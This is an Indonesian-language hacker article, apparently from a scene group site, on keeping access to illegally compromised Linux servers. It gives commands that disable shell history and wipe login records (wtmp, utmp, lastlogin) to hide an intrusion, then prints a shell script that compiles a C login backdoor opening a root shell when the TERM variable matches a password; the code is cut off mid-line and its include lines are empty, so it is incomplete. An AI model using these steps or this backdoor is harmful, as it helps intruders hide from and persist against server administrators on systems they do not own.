Artikel From Rozy Crew


=================================================================================================
Jika Anda Ingin Berbagi Ilmu
Tentang Ilmu Komputer
Tolong Kirimkan Tips dan Trik atau Artikel Anda
Ke Rozy@hehe.com atau Rozy_eksa@yahoo.com 
VER Bahasa Indonesia
=================================================================================================

TIPS 'MERAWAT SERVER LINUX ILLEGAL AGAR AWET'

Tips ini mungkin sebenarnya bukan barang baru buat rekan-rekan sekalian.
Atau mungkin sebelumnya sudah ada yang menggunakan. Jadi kami bukan yang pertama menemukan tips ini.
Hanya sebagai bahan 'refreshing' saja buat kita semua agar tidak hanya 'mendapatkan dan menggunakan' server 'bajakan' hasil kerja sehari semalam.
He he he .. just kidding .. Tapi, juga merawat server kalian agar tidak cepat dihapus aksesnya oleh administrator server tersebut.
Dan box untuk melakukannya adalah di box server dengan operating system LINUX. Tips tersebut terbagi ke dalam dua session. Yang pertama adalah :

(i) menghapus activities-logging
biasanya ... setelah 'menjebol' atau meng-eksploit salah satu server dengan o/s LINUX dengan menggunakan program 'sendiri' maupun 'copy-paste' [script kiddy]
adalah mengcreate user baik itu user login dan akses root [-u 0].
Biasanya user account tersebut tersimpan dalam data user yang ada pada server tersebut [/etc/passwd].
Kalau administrator server tersebut 'rajin' dan selalu mem-backup servernya -- NISCAYA -- dijamin 100% user account kalian pasti akan cepat terhapus.
Bagaimana solusinya ? Tips yang kami sampaikan disini adalah tips remote server dengan menggunakan akses telnet atau SSH.
Tapi sebaiknya telnet connection yang digunakan.

Begitu login user masuk kedalam server yang diremote, langsung laksanakan command -->

export HISTFILE=/dev/null ;
export HISTSIZE=0;
export HISTFILESIZE=0 <-- sebelum melakukan aktifitas lainnya.

Command ini adalah menghilangkan history yang ter-log di dalam server tersebut.
Biasanya history yang tersimpan/ter-logging dan dapat dilihat di /home/ /.bash_- echo > /var/log/wtmp - echo > /var/run/utmp
- echo > /var/log/lastlogin

Command-command tersebut adalah command untuk menghilangkan jejak pada saat login ke remote server.
Kita tidak perlu menginstalasi program lainnya didalam server atau menghapus file-file yang sudah ada pada remote server.
Karena itu akan menambah kecurigaan 'sang admin', bahwa server mereka telah ter-susupi oleh kalian.

Resume

* command --> export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 <-- dapat dilakukan dengan menggunakan akses user biasa maupun root.
Tapi, bila sudah digunakan pada user biasa, pada akses root tidak perlu lagi dilakukan.

* command :
- echo > /var/log/wtmp
- echo > /var/run/utmp
- echo > /var/log/lastlogin

harus dilakukan pada saat kalian sudah 'jump' sebagai root,
pada saat sebagai user biasa command ini tidak dapat dilakukan.

(ii) membuat backdoor TERM
Nah .. setelah menyelesaikan session pertama.
Sekarang memasuki session kedua yaitu membuat backdoor pada server tersebut dengan menggunakan pemrograman yang ada di cyberspace.
Banyak pemrograman backdoor. Sampai pusing mungkin ... Tapi kami disini mempunyai salah satu source dari pemrograman backdoor.
Bukan kami yang membuat ! Tapi, karena backdoor ini kami temukan di cyberspace, jadi itu sudah kami anggap merupakan pemrograman open-source dan 'mungkin' bisa dipergunakan untuk ke kalangan multi-user.
Source codenya sebagai berikut :

---------- don't copy here ----------

#!/bin/sh
blink=""
cl="m"
wht="m"
red="m"
bwht="m"
bg="m"

blinkredflag="$blink $red [FLAG] $cl"
clear

# MUD.SH
# ver.2.1.0 = 1:03 AM 1/18/01 ; ver.2.1.1 = 4:35 PM 1/19/01
by=garageboxus@yahoo.com # Greetz To ANTIONLINE CREW - ALL OF US ARE
LAMERS TOO # THIS PROGRAM IS JUST FOR SCRIPT-KIDDY
# chmod +x mud.sh ; ./mud.sh
# Special Greetz To .:: TESSO TEAM ::.

#!/bin/sh
if [ -f /usr/bin/gcc ]
then
echo "Loading Program.... "
echo "Ough You Are Just Script Kiddy..... "

echo "Type PASSWORD for r00t access.... "
read pass

echo "Read Your Password..... "

cat >> mud.c << _EOF_
#define _XOPEN_SOURCE
#include
#include
#include
#include
#include

#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/usr/bin/load"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "$pass"
#define ENV_FIX "vt100"

int owned(void);

char **av, **ep;

int main(int argc, char **argv, char **envp) {
av=argv;
ep=envp;
av[0]=SHELL_CALLME;

if (owned()) {
char *sav[]={
SHELL_CALLME, NULL
};

execve(SHELL, sav, ep);
return 0;
}
execve(LOGIN, av, ep);
return 0;
}

int owned(void) {
char *name, *value;
int i;
for (i=0; ep[i]!=NULL; ++i) {
name=strtok(ep[i], "=");
value=strtok(NULL, "=");
if (name==NULL || value==NULL) continue;
if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUCCCC

  

 

<<< BACK >>>